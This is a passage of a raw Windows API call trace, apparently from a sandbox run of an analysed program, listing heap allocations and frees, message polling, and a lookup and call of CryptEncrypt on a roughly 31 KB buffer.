lpMsg=0x8bef60) returned 0 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c6e98 | out: hHeap=0x25c0000) returned 1 [0260.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.250] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0260.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.253] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c10 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0260.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0260.253] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7a1a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7a20) returned 1 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.257] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0260.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.259] CharLowerBuffW (in: lpsz="byte[31264]", cchLength=0xb | out: lpsz="byte[31264]") returned 0xb [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0260.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0260.260] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.260] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 